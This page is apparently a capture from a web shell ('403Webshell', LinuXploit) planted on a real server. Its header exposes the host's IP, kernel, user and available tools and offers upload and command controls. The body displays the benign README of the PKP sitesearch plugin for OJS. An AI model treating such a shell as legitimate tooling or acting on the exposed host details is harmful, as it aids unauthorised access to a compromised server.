403Webshell
Server IP : 195.134.90.114  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.58
System : Linux nepub 6.8.0-88-generic #89-Ubuntu SMP PREEMPT_DYNAMIC Sat Oct 11 01:02:46 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : OFF
Directory :  /var/www/html/public_html/plugins/generic/sitesearch/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /var/www/html/public_html/plugins/generic/sitesearch/README.md
# Sitesearch plugin for PKP

This plugin rewrites the search for a context to the site level.  This is used in the case where one journal has assumed the operations of one or more other journals (which are installed in the same site).

For example, suppose the Journal of Autonomous Variables (JoAV) used to be called the Journal of Variable Technology (JoVT), and also took over for the Journal of Variable Mechanics (JoVM).  When viewing JoVT or JoVM, the JoAV managers may want searches to include both the archival content and the new content from the current journal publication.  Enabling this plugin for JoVT and JoVM will force searches done in those journals to be performed at the site level, including the contents from all journals.

## Requirements

* OJS 3.x / OMP 3.1 or later
* PHP 7.2 or later

For an OJS 2.x. analog, see the [Block Site Search](https://github.com/ulsdevteam/ojs-sitesearch-plugin/) plugin.

## Installation

Install this as a "generic" plugin. The preferred installation method is through the Plugin Gallery.

To install manually via the filesystem, extract the contents of this archive to an "sitesearch" directory under "plugins/generic" in your OJS root.  To install via Git submodule, target that same directory path: `git submodule add https://github.com/ulsdevteam/pkp-sitesearch plugins/generic/sitesearch`.  Run the plugin install script to register this plugin, e.g.: `php lib/pkp/tools/installPluginVersion.php plugins/generic/sitesearch/version.xml`, or run the upgrade script, e.g.: `php tools/upgrade.php upgrade`

## Configuration

No configuration is needed.  Just enable and go!

## Usage

The display of templates for the search handler and for the simple searchbar will be modified to point to the index search for the context(s) in which this is enabled.

## Author / License

Written by Clinton Graham for the [University of Pittsburgh](http://www.pitt.edu).  Copyright (c) University of Pittsburgh.

Released under a license of GPL v2 or later.

Youez - 2016 - github.com/yon3zu
LinuXploit